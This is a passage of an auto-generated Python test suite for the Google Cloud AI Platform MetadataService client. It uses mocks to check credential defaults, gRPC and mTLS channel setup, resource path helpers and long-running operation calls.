adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.MetadataServiceTransport()
adc.assert_called_once()
def test_metadata_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
MetadataServiceClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.MetadataServiceGrpcTransport,
transports.MetadataServiceGrpcAsyncIOTransport,
],
)
def test_metadata_service_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.MetadataServiceGrpcTransport, grpc_helpers),
(transports.MetadataServiceGrpcAsyncIOTransport, grpc_helpers_async),
],
)
def test_metadata_service_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
create_channel.assert_called_with(
"aiplatform.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
scopes=["1", "2"],
default_host="aiplatform.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"transport_class",
[
transports.MetadataServiceGrpcTransport,
transports.MetadataServiceGrpcAsyncIOTransport,
],
)
def test_metadata_service_grpc_transport_client_cert_source_for_mtls(transport_class):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds,
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback,
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert, private_key=expected_key
)
@pytest.mark.parametrize(
"transport_name",
[
"grpc",
"grpc_asyncio",
],
)
def test_metadata_service_host_no_port(transport_name):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="aiplatform.googleapis.com"
),
transport=transport_name,
)
assert client.transport._host == ("aiplatform.googleapis.com:443")
@pytest.mark.parametrize(
"transport_name",
[
"grpc",
"grpc_asyncio",
],
)
def test_metadata_service_host_with_port(transport_name):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="aiplatform.googleapis.com:8000"
),
transport=transport_name,
)
assert client.transport._host == ("aiplatform.googleapis.com:8000")
def test_metadata_service_grpc_transport_channel():
channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.MetadataServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
def test_metadata_service_grpc_asyncio_transport_channel():
channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.MetadataServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
"transport_class",
[
transports.MetadataServiceGrpcTransport,
transports.MetadataServiceGrpcAsyncIOTransport,
],
)
def test_metadata_service_transport_channel_mtls_with_client_cert_source(
transport_class,
):
with mock.patch(
"grpc.ssl_channel_credentials", autospec=True
) as grpc_ssl_channel_cred:
with mock.patch.object(
transport_class, "create_channel"
) as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
"transport_class",
[
transports.MetadataServiceGrpcTransport,
transports.MetadataServiceGrpcAsyncIOTransport,
],
)
def test_metadata_service_transport_channel_mtls_with_adc(transport_class):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(
transport_class, "create_channel"
) as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_metadata_service_grpc_lro_client():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
transport = client.transport
# Ensure that we have a api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsClient,
)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_metadata_service_grpc_lro_async_client():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc_asyncio",
)
transport = client.transport
# Ensure that we have a api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsAsyncClient,
)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_artifact_path():
project = "squid"
location = "clam"
metadata_store = "whelk"
artifact = "octopus"
expected = "projects/{project}/locations/{location}/metadataStores/{metadata_store}/artifacts/{artifact}".format(
project=project,
location=location,
metadata_store=metadata_store,
artifact=artifact,
)
actual = MetadataServiceClient.artifact_path(
project, location, metadata_store, artifact
)
assert expected == actual
def test_parse_artifact_path():
expected = {
"project": "oyster",
"location": "nudibranch",
"metadata_store": "cuttlefish",
"artifact": "mussel",
}
path = MetadataServiceClient.artifact_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_artifact_path(path)
assert expected == actual
def test_context_path():
project = "winkle"
location = "nautilus"
metadata_store = "scallop"
context = "abalone"
expected = "projects/{project}/locations/{location}/metadataStores/{metadata_store}/contexts/{context}".format(
project=project,
location=location,
metadata_store=metadata_store,
context=context,
)
actual = MetadataServiceClient.context_path(
project, location, metadata_store, context
)
assert expected == actual
def test_parse_context_path():
expected = {
"project": "squid",
"location": "clam",
"metadata_store": "whelk",
"context": "octopus",
}
path = MetadataServiceClient.context_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_context_path(path)
assert expected == actual
def test_execution_path():
project = "oyster"
location = "nudibranch"
metadata_store = "cuttlefish"
execution = "mussel"
expected = "projects/{project}/locations/{location}/metadataStores/{metadata_store}/executions/{execution}".format(
project=project,
location=location,
metadata_store=metadata_store,
execution=execution,
)
actual = MetadataServiceClient.execution_path(
project, location, metadata_store, execution
)
assert expected == actual
def test_parse_execution_path():
expected = {
"project": "winkle",
"location": "nautilus",
"metadata_store": "scallop",
"execution": "abalone",
}
path = MetadataServiceClient.execution_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_execution_path(path)
assert expected == actual
def test_metadata_schema_path():
project = "squid"
location = "clam"
metadata_store = "whelk"
metadata_schema = "octopus"
expected = "projects/{project}/locations/{location}/metadataStores/{metadata_store}/metadataSchemas/{metadata_schema}".format(
project=project,
location=location,
metadata_store=metadata_store,
metadata_schema=metadata_schema,
)
actual = MetadataServiceClient.metadata_schema_path(
project, location, metadata_store, metadata_schema
)
assert expected == actual
def test_parse_metadata_schema_path():
expected = {
"project": "oyster",
"location": "nudibranch",
"metadata_store": "cuttlefish",
"metadata_schema": "mussel",
}
path = MetadataServiceClient.metadata_schema_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_metadata_schema_path(path)
assert expected == actual
def test_metadata_store_path():
project = "winkle"
location = "nautilus"
metadata_store = "scallop"
expected = "projects/{project}/locations/{location}/metadataStores/{metadata_store}".format(
project=project,
location=location,
metadata_store=metadata_store,
)
actual = MetadataServiceClient.metadata_store_path(
project, location, metadata_store
)
assert expected == actual
def test_parse_metadata_store_path():
expected = {
"project": "abalone",
"location": "squid",
"metadata_store": "clam",
}
path = MetadataServiceClient.metadata_store_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_metadata_store_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "whelk"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = MetadataServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "octopus",
}
path = MetadataServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "oyster"
expected = "folders/{folder}".format(
folder=folder,
)
actual = MetadataServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "nudibranch",
}
path = MetadataServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "cuttlefish"
expected = "organizations/{organization}".format(
organization=organization,
)
actual = MetadataServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "mussel",
}
path = MetadataServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "winkle"
expected = "projects/{project}".format(
project=project,
)
actual = MetadataServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "nautilus",
}
path = MetadataServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "scallop"
location = "abalone"
expected = "projects/{project}/locations/{location}".format(
project=project,
location=location,
)
actual = MetadataServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "squid",
"location": "clam",
}
path = MetadataServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_with_default_client_info():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.MetadataServiceTransport, "_prep_wrapped_messages"
) as prep:
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.MetadataServiceTransport, "_prep_wrapped_messages"
) as prep:
transport_class = MetadataServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc_asyncio",
)
with mock.patch.object(
type(getattr(client.transport, "grpc_channel")), "close"
) as close:
async with client:
close.assert_not_called()
close.assert_called_once()
def test_delete_operation(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.DeleteOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_operation(transport: str = "grpc"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.DeleteOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
def test_delete_operation_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.DeleteOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
call.return_value = None
client.delete_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_operation_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.DeleteOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_delete_operation_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_operation(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_delete_operation_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_operation(
request={
"name": "locations",
}
)
call.assert_called()
def test_cancel_operation(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.CancelOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.cancel_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_cancel_operation(transport: str = "grpc"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.CancelOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.cancel_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
def test_cancel_operation_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.CancelOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
call.return_value = None
client.cancel_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_cancel_operation_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.CancelOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.cancel_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_cancel_operation_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.cancel_operation(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_cancel_operation_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.cancel_operation(
request={
"name": "locations",
}
)
call.assert_called()
def test_wait_operation(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.WaitOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation()
response = client.wait_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.Operation)
@pytest.mark.asyncio
async def test_wait_operation(transport: str = "grpc"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.WaitOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
response = await client.wait_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.Operation)
def test_wait_operation_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.WaitOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
call.return_value = operations_pb2.Operation()
client.wait_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_wait_operation_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.WaitOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
await client.wait_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_wait_operation_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation()
response = client.wait_operation(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_wait_operation_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
response = await client.wait_operation(
request={
"name": "locations",
}
)
call.assert_called()
def test_get_operation(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.GetOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation()
response = client.get_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.Operation)
@pytest.mark.asyncio
async def test_get_operation(transport: str = "grpc"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.GetOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
response = await client.get_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.Operation)
def test_get_operation_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.GetOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
call.return_value = operations_pb2.Operation()
client.get_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_operation_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.GetOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
await client.get_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_get_operation_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation()
response = client.get_operation(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_get_operation_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
response = await client.get_operation(
request={
"name": "locations",
}
)
call.assert_called()
def test_list_operations(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.ListOperationsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.ListOperationsResponse()
response = client.list_operations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.ListOperationsResponse)
@pytest.mark.asyncio
async def test_list_operations(transport: str = "grpc"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.ListOperationsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.ListOperationsResponse()
)
response = await client.list_operations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.ListOperationsResponse)
def test_list_operations_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.ListOperationsRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
call.return_value = operations_pb2.ListOperationsResponse()
client.list_operations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
